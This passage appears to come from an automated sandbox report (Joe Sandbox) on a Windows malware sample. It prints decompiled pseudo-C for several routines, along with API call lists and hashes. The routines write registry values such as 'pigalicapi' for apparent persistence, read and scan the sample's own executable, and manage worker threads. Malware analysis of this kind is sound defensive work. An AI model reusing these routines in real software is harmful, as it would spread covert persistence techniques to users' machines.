                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(Mvqcsgcuwwini,WDefault), ref: 04005A47
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005930: CharUpperA.USER32(00000000), ref: 040059E2
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005AA1
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Mvqcsgcuwwini), ref: 04005AAE
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Mvqcsgcuwwini), ref: 04005AC8
                                                                                                                                                                                                                                                                                          • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04005B0E
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 04005B31
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B3B
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                                                          • String ID: Mvqcsgcuwwini$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                                                                                                                          • API String ID: 4161867159-611550020
                                                                                                                                                                                                                                                                                          • Opcode ID: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
                                                                                                                                                                                                                                                                                          • Instruction ID: 2f1465acc8a4d9a659e2af8a658b36752d7f83b1b7b92a7dc582af9786930c23
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40310775600208FBEB14DFA4DC49FAA37B9EB44708F04C615FA15BB281D7B8AA50CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04005F30() {
                                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                                          				signed int _v9;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                                                                                                          				int _v288;
                                                                                                                                                                                                                                                                                          				int _v292;
                                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                                          				int _v328;
                                                                                                                                                                                                                                                                                          				char* _t27;
                                                                                                                                                                                                                                                                                          				CHAR* _t30;
                                                                                                                                                                                                                                                                                          				long _t33;
                                                                                                                                                                                                                                                                                          				long _t37;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                                          				_t27 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          				_v8 = _t27;
                                                                                                                                                                                                                                                                                          				E04007D20(_t27,  &_v284, 0, 0x104);
                                                                                                                                                                                                                                                                                          				lstrcpyA( &_v284, "pigalicapi");
                                                                                                                                                                                                                                                                                          				_t30 =  *0x4011898; // 0x4013fe2
                                                                                                                                                                                                                                                                                          				lstrcatA( &_v284, _t30);
                                                                                                                                                                                                                                                                                          				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                          					_v292 = 0x20;
                                                                                                                                                                                                                                                                                          					_v288 = 0x20;
                                                                                                                                                                                                                                                                                          					_t37 = RegQueryValueExA(_v20,  &_v284, 0, 0,  &_v324,  &_v288); // executed
                                                                                                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                          						_v9 = 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t47 = _v9 & 0x000000ff;
                                                                                                                                                                                                                                                                                          					if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						_v328 = 0x10;
                                                                                                                                                                                                                                                                                          						E04009BD0(_t47,  &_v324, 0x10);
                                                                                                                                                                                                                                                                                          						RegSetValueExA(_v20,  &_v284, 0, 3,  &_v324, 0x10); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v9;
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x04005f39
                                                                                                                                                                                                                                                                                          0x04005f3d
                                                                                                                                                                                                                                                                                          0x04005f42
                                                                                                                                                                                                                                                                                          0x04005f53
                                                                                                                                                                                                                                                                                          0x04005f67
                                                                                                                                                                                                                                                                                          0x04005f6d
                                                                                                                                                                                                                                                                                          0x04005f7a
                                                                                                                                                                                                                                                                                          0x04005f80
                                                                                                                                                                                                                                                                                          0x04005f90
                                                                                                                                                                                                                                                                                          0x04005f92
                                                                                                                                                                                                                                                                                          0x04005f92
                                                                                                                                                                                                                                                                                          0x04005f99
                                                                                                                                                                                                                                                                                          0x04005fb3
                                                                                                                                                                                                                                                                                          0x04005fbb
                                                                                                                                                                                                                                                                                          0x04005fc1
                                                                                                                                                                                                                                                                                          0x04005fcb
                                                                                                                                                                                                                                                                                          0x04005ff2
                                                                                                                                                                                                                                                                                          0x04005ffa
                                                                                                                                                                                                                                                                                          0x04005ffc
                                                                                                                                                                                                                                                                                          0x04005ffc
                                                                                                                                                                                                                                                                                          0x04006000
                                                                                                                                                                                                                                                                                          0x04006006
                                                                                                                                                                                                                                                                                          0x04006008
                                                                                                                                                                                                                                                                                          0x0400601b
                                                                                                                                                                                                                                                                                          0x0400603b
                                                                                                                                                                                                                                                                                          0x0400603b
                                                                                                                                                                                                                                                                                          0x04006045
                                                                                                                                                                                                                                                                                          0x04006045
                                                                                                                                                                                                                                                                                          0x04006051

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
                                                                                                                                                                                                                                                                                          • RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04006045
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                                                          • String ID: $ $pigalicapi
                                                                                                                                                                                                                                                                                          • API String ID: 764223185-550099112
                                                                                                                                                                                                                                                                                          • Opcode ID: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
                                                                                                                                                                                                                                                                                          • Instruction ID: d868066335aa3bc34e1d01a835705104c70e08da6b50357c6a08ba3ec109f492
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F3143B194021CABEB14CF90DC45FFEB7B8EB08704F048598EB04B6181D7B96A85CF60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04004096() {
                                                                                                                                                                                                                                                                                          				void _t92;
                                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                                          				void* _t166;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				L0:
                                                                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                                                                          					L0:
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x38)) =  *((intOrPtr*)(_t161 - 0x38)) + 1;
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x38)) >=  *((intOrPtr*)(_t161 + 0x14))) {
                                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                                          						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t171 =  *(_t161 - 0x34);
                                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x34) != 0) {
                                                                                                                                                                                                                                                                                          						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x34) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					ResetEvent( *(_t161 - 0x10));
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                          					_t92 = CreateThread(0, 0, E04004AC0, _t161 - 0x34, 0, 0); // executed
                                                                                                                                                                                                                                                                                          					 *(_t161 - 0x34) = _t92;
                                                                                                                                                                                                                                                                                          					 *(_t161 - 0x64) = E040097A0( ~(0 | _t171 > 0x00000000) |  *(_t161 + 0x18) * 0x00000004);
                                                                                                                                                                                                                                                                                          					 *(_t161 - 0x3c) =  *(_t161 - 0x64);
                                                                                                                                                                                                                                                                                          					E04007D20( *(_t161 - 0x64),  *(_t161 - 0x3c), 0,  *(_t161 + 0x18) << 2);
                                                                                                                                                                                                                                                                                          					_t166 = _t163 + 0x10;
                                                                                                                                                                                                                                                                                          					 *(_t161 - 0x60) = 0;
                                                                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                                                                          					while( *(_t161 - 0x60) <  *(_t161 + 0x18)) {
                                                                                                                                                                                                                                                                                          						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = 0;
                                                                                                                                                                                                                                                                                          						E04007D20( *(_t161 - 0x3c), _t161 - 0x58, 0, 0x1c);
                                                                                                                                                                                                                                                                                          						_t166 = _t166 + 0xc;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t161 - 0x40)) = _t161 - 0x34;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t161 - 0x44)) =  *((intOrPtr*)(_t161 + 0x10));
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x58) =  *(_t161 + 8);
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x50) =  *(_t161 - 0x60) *  *(_t161 - 8);
                                                                                                                                                                                                                                                                                          						if( *(_t161 - 0x60) >=  *(_t161 + 0x18) - 1) {
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t161 - 0x4c)) =  *((intOrPtr*)(_t161 + 0xc)) - 1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t161 - 0x4c)) =  *(_t161 - 0x50) +  *(_t161 - 8) - 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x48) = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                          						_t114 = CreateThread(0, 0, E04004BA0, _t161 - 0x58, 0, 0); // executed
                                                                                                                                                                                                                                                                                          						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = _t114;
                                                                                                                                                                                                                                                                                          						WaitForSingleObject( *(_t161 - 0x48), 0xffffffff);
                                                                                                                                                                                                                                                                                          						FindCloseChangeNotification( *(_t161 - 0x48)); // executed
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x60) =  *(_t161 - 0x60) + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					WaitForMultipleObjects( *(_t161 + 0x18),  *(_t161 - 0x3c), 1, 0xffffffff);
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x10), 0x2710);
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x5c)) == 0) {
                                                                                                                                                                                                                                                                                          						 *(_t161 - 1) = 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x34), 0x3e8);
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t161 - 0x5c)) != 0) {
                                                                                                                                                                                                                                                                                          						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                                          					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                          					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                                          						VirtualFree( *(_t161 - 0x30), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                                          						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                                                                                                          					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                          					 *(_t161 - 0x68) =  *(_t161 - 0x3c);
                                                                                                                                                                                                                                                                                          					E040097C0( *(_t161 - 0x68));
                                                                                                                                                                                                                                                                                          					if(( *(_t161 - 1) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					break;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L22:
                                                                                                                                                                                                                                                                                          				DeleteCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                                          				return  *(_t161 - 1);
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                                          0x04004096
                                                                                                                                                                                                                                                                                          0x0400409c
                                                                                                                                                                                                                                                                                          0x040040a5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040040ab
                                                                                                                                                                                                                                                                                          0x040040af
                                                                                                                                                                                                                                                                                          0x040040b9
                                                                                                                                                                                                                                                                                          0x040040c6
                                                                                                                                                                                                                                                                                          0x040040cc
                                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                                          0x040040da
                                                                                                                                                                                                                                                                                          0x040040de
                                                                                                                                                                                                                                                                                          0x040040e6
                                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                                          0x040040f7
                                                                                                                                                                                                                                                                                          0x04004101
                                                                                                                                                                                                                                                                                          0x04004118
                                                                                                                                                                                                                                                                                          0x0400411e
                                                                                                                                                                                                                                                                                          0x0400413d
                                                                                                                                                                                                                                                                                          0x04004143
                                                                                                                                                                                                                                                                                          0x04004153
                                                                                                                                                                                                                                                                                          0x04004158
                                                                                                                                                                                                                                                                                          0x0400415b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400416d
                                                                                                                                                                                                                                                                                          0x0400417f
                                                                                                                                                                                                                                                                                          0x0400418e
                                                                                                                                                                                                                                                                                          0x04004193
                                                                                                                                                                                                                                                                                          0x04004199
                                                                                                                                                                                                                                                                                          0x0400419f
                                                                                                                                                                                                                                                                                          0x040041a5
                                                                                                                                                                                                                                                                                          0x040041af
                                                                                                                                                                                                                                                                                          0x040041bb
                                                                                                                                                                                                                                                                                          0x040041d2
                                                                                                                                                                                                                                                                                          0x040041bd
                                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                                          0x040041e3
                                                                                                                                                                                                                                                                                          0x040041f7
                                                                                                                                                                                                                                                                                          0x04004203
                                                                                                                                                                                                                                                                                          0x0400420c
                                                                                                                                                                                                                                                                                          0x04004216
                                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                                          0x0400422d
                                                                                                                                                                                                                                                                                          0x04004242
                                                                                                                                                                                                                                                                                          0x04004249
                                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                                          0x0400425e
                                                                                                                                                                                                                                                                                          0x04004265
                                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                                          0x04004273
                                                                                                                                                                                                                                                                                          0x04004277
                                                                                                                                                                                                                                                                                          0x04004281
                                                                                                                                                                                                                                                                                          0x0400428e
                                                                                                                                                                                                                                                                                          0x04004294
                                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                                          0x040042a2
                                                                                                                                                                                                                                                                                          0x040042a6
                                                                                                                                                                                                                                                                                          0x040042af
                                                                                                                                                                                                                                                                                          0x040042b6
                                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                                          0x040042c8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040042c8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                                          0x040042cd
                                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                                          0x040042dd

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 040041F7
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
                                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 04004216
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 371823443-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
                                                                                                                                                                                                                                                                                          • Instruction ID: 702011c11570e1e92260a3d6b56584955ffb64453fe6a6bb8e3d44d087611259
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E51D7B5A40308AFEB18DF94D899BDDBBB1FB48704F108219F605BB2C0D774A940CB54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04004510(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				char _v780;
                                                                                                                                                                                                                                                                                          				void* _v784;
                                                                                                                                                                                                                                                                                          				char _v1308;
                                                                                                                                                                                                                                                                                          				long _v1312;
                                                                                                                                                                                                                                                                                          				void* _v1316;
                                                                                                                                                                                                                                                                                          				long _v1320;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1324;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1328;
                                                                                                                                                                                                                                                                                          				signed int _v1332;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1336;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1340;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1344;
                                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                                          				int _t97;
                                                                                                                                                                                                                                                                                          				signed char _t101;
                                                                                                                                                                                                                                                                                          				signed char _t114;
                                                                                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                                                                                          				void* _t156;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                          					L24:
                                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					E04007D20(E04007D20( &_v780,  &_v780, 0, 0x300),  &_v1308, 0, 0x208);
                                                                                                                                                                                                                                                                                          					_t155 = _t153 + 0x18;
                                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0,  &_v1308, 0x208);
                                                                                                                                                                                                                                                                                          					_t90 = CreateFileA( &_v1308, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                          					_v784 = _t90;
                                                                                                                                                                                                                                                                                          					if(_v784 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v1312 = GetFileSize(_v784, 0);
                                                                                                                                                                                                                                                                                          					if(_v1312 == 0) {
                                                                                                                                                                                                                                                                                          						L22:
                                                                                                                                                                                                                                                                                          						if(_v784 != 0) {
                                                                                                                                                                                                                                                                                          							CloseHandle(_v784);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t94 = VirtualAlloc(0, _v1312, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          					_v1316 = _t94;
                                                                                                                                                                                                                                                                                          					if(_v1316 == 0) {
                                                                                                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v1320 = 0;
                                                                                                                                                                                                                                                                                          					_t97 = ReadFile(_v784, _v1316, _v1312,  &_v1320, 0); // executed
                                                                                                                                                                                                                                                                                          					if(_t97 == 0 || _v1320 != _v1312) {
                                                                                                                                                                                                                                                                                          						L20:
                                                                                                                                                                                                                                                                                          						if(_v1316 != 0) {
                                                                                                                                                                                                                                                                                          							VirtualFree(_v1316, 0, 0x8000);
                                                                                                                                                                                                                                                                                          							_v1316 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						FindCloseChangeNotification(_v784); // executed
                                                                                                                                                                                                                                                                                          						_v784 = 0;
                                                                                                                                                                                                                                                                                          						_t101 = E040047F0(_v1316, _v1312, _a8); // executed
                                                                                                                                                                                                                                                                                          						_t156 = _t155 + 0xc;
                                                                                                                                                                                                                                                                                          						if((_t101 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          							if(_v1316 != 0) {
                                                                                                                                                                                                                                                                                          								VirtualFree(_v1316, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          								_v1316 = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v1328 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                                          							_v1324 = _v1328 + ( *(_v1328 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                                          							_v1332 = 0;
                                                                                                                                                                                                                                                                                          							while(_v1332 < ( *(_v1328 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                          								_v1336 =  *((intOrPtr*)(_v1324 + 0xc + _v1332 * 0x28)) + _a4;
                                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28)) <=  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28))) {
                                                                                                                                                                                                                                                                                          									_v1344 =  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_v1344 =  *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28));
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v1340 = _v1344;
                                                                                                                                                                                                                                                                                          								_t114 = E040047F0(_v1336, _v1340, _a8); // executed
                                                                                                                                                                                                                                                                                          								_t156 = _t156 + 0xc;
                                                                                                                                                                                                                                                                                          								if((_t114 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          									_v1332 = _v1332 + 1;
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_v5 = 1;
                                                                                                                                                                                                                                                                                          									goto L20;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v5 = 1;
